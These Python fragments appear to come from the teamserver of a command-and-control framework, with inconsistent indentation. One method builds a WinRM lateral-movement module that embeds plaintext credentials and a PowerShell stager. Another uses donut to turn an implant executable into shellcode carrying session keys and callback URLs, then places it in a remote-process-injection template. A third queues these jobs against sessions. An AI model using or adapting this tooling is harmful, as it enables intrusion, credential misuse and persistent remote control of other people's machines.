    def payload(self):
        """Render the WinRM module source for the configured listener.

        Resolves a PowerShell stager and the selected listener through the
        IPC server. On success it registers a new session (guid, psk) and
        returns the module template with its placeholders substituted;
        otherwise it reports via print_bad and returns None.
        """
        opts = self.options
        stager = ipc_server.publish_event(events.GET_STAGERS, ('powershell', ))
        listener = ipc_server.publish_event(
            events.GET_LISTENERS, (opts['Listener']['Value'], ))

        if not (stager and listener):
            # NOTE: this branch is also reached when the *stager* lookup fails,
            # so the message does not always point at the real cause.
            print_bad('Invalid listener selected')
            return None

        stager.options['AsFunction']['Value'] = False

        with open('core/teamserver/modules/boo/src/winrm.boo',
                  'r') as module_src:
            guid, psk, stage = stager.generate(listener)
            ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
            template = module_src.read()

        # Plain string substitution, applied in this order. The configured
        # credentials are embedded verbatim in the returned source, so the
        # result must be handled as sensitive data.
        substitutions = (
            ('TARGET', opts['Host']['Value']),
            ('USERNAME', opts['Username']['Value']),
            ('DOMAIN', opts['Domain']['Value']),
            ('PASSWORD', opts['Password']['Value']),
            ('TRUSTED_HOSTS', str(opts['AddToTrustedHosts']['Value']).lower()),
            ('PAYLOAD', f'`{stage}`'),
        )
        for placeholder, value in substitutions:
            template = template.replace(placeholder, value)
        return template
    def payload(self):
        """Build the inject-remote module source for the configured listener.

        Looks the listener up through the IPC server, registers a fresh
        session (guid, psk), packages the naga executable with donut using the
        session parameters and listener URLs, and returns the module template
        with the byte array and target process substituted. Reports via
        print_bad and returns None when the listener is not found.
        """
        opts = self.options
        listener_name = opts['Listener']['Value']
        listener = ipc_server.publish_event(events.GET_LISTENERS, (listener_name, ))
        if not listener:
            print_bad(f"Listener '{listener_name}' not found!")
            return None

        # Bind address first; the callback entry is dropped when it is falsy.
        url_parts = [
            f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
            listener['CallBackURls'],
        ]
        c2_urls = ','.join(part for part in url_parts if part)

        guid = uuid.uuid4()
        psk = gen_stager_psk()
        ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))

        arch = 2 if opts['Architecture']['Value'] == 'x64' else 1
        donut_shellcode = donut.create(
            file='./core/teamserver/data/naga.exe',
            params=f"{guid};{psk};{c2_urls}",
            arch=arch)
        shellcode = shellcode_to_int_byte_array(donut_shellcode)

        # Only the injectremote template is wired up here; the InjectionMethod
        # option is not consulted.
        with open('core/teamserver/modules/boo/src/injectremote.boo',
                  'r') as module_src:
            template = module_src.read()
        template = template.replace('BYTES', shellcode)
        template = template.replace('PROCESS', opts['Process']['Value'])
        return template
 def run(self, guids):
     """Publish a NEW_JOB event for every guid, with a fresh Job per guid."""
     for session_guid in guids:
         # A separate Job instance per guid, as the original did.
         job = Job(module=self.selected)
         ipc_server.publish_event(events.NEW_JOB, (session_guid, job))